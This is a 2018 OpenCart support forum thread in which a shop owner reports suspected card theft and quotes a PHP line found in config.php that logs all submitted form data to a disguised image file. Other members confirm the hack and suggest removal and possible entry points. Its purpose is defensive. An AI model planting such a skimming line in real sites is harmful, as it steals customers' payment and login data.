Post by zaidladha » Sat Mar 24, 2018 8:04 am

Hi,
I believe someone has gotten into my site ( I have had a couple people complain about credit cards being compromised, but only the random occurrence, not enough to make 100% sure its my site, but its starting to seem like too much of a coincidence because we had 0 people complain in previous years.

I found this in the config.php file (non admin)

if(!empty($_POST)) { $post = serialize($_POST); $f = $_SERVER['REMOTE_ADDR'].":".$post."\n"; $file = fopen('/var/www/html/image/catalog/Viking/vw24y.png','a+'); fwrite($file,$f);fclose($file);}

Active Member

Posts

Joined
Wed Jun 05, 2013 3:07 pm

Post by thekrotek » Sat Mar 24, 2018 8:41 am

Yes, you've been hacked. This code literally steals ALL the posted data. A pretty dumb hack, actually.

Remove this code as well as image file mentioned in it.

Professional OpenCart extensions, support and custom work.
Contact me via email or Skype by support@thekrotek.com


User avatar
Expert Member
Online

Posts

Joined
Sun Jul 03, 2016 12:24 am


Post by zaidladha » Sat Mar 24, 2018 11:44 am

Is there a way to find out how they got in? Is there a particular log? I had just looked at config a few days ago so I know it was clean then.

Active Member

Posts

Joined
Wed Jun 05, 2013 3:07 pm

Post by IP_CAM » Sat Mar 24, 2018 1:56 pm

Well, let us know first, what you did to your Site lately on changes, how are
your config.php and general Site Sub&File&Image CHMOD
Settings, how is your .htaccess File looking from the inside, e.t.c.,
and what do your allow your Customers to do on your Site (Upload/Reseller/etc.)
all details, required to be known, exactly, to even guess...
Ernie

I'm rarely active at the OC Forum lately. To reach me, contact: jti@jacob.ch
A Demoversion of my free OpenCart LIGHT v.1.5.6.5 Software Edition
can be seen in real Action here: http://www.jti.li/shop/
---
1'100+ FREE OC Extension-Repositories - from OC v.1.5.x up,
on the world's largest OC-related Github Site: https://github.com/IP-CAM
---
Image


User avatar
Legendary Member

Posts

Joined
Tue Mar 04, 2014 1:37 am
Location - Switzerland

Post by thekrotek » Sat Mar 24, 2018 4:27 pm

zaidladha wrote:
Sat Mar 24, 2018 11:44 am
Is there a way to find out how they got in? Is there a particular log? I had just looked at config a few days ago so I know it was clean then.
They got in using exploits. They're not logged, of course.

Professional OpenCart extensions, support and custom work.
Contact me via email or Skype by support@thekrotek.com


User avatar
Expert Member
Online

Posts

Joined
Sun Jul 03, 2016 12:24 am


Post by paulfeakins » Mon Mar 26, 2018 5:55 pm

thekrotek wrote:
Sat Mar 24, 2018 4:27 pm
They got in using exploits. They're not logged, of course.
Possibly weak passwords on your FTP, control panel, database, OpenCart admin etc.

For quick, professional OpenCart support please email info@antropy.co.uk


User avatar
Expert Member

Posts

Joined
Mon Aug 22, 2011 11:01 pm
Location - Reigate, Surrey, United Kingdom

Post by thekrotek » Mon Mar 26, 2018 6:36 pm

paulfeakins wrote:
Mon Mar 26, 2018 5:55 pm
Possibly weak passwords on your FTP, control panel, database, OpenCart admin etc.
It actually might be just an exploit in current version of OS installed on server.

Professional OpenCart extensions, support and custom work.
Contact me via email or Skype by support@thekrotek.com


User avatar
Expert Member
Online

Posts

Joined
Sun Jul 03, 2016 12:24 am

Who is online

Users browsing this forum: No registered users and 44 guests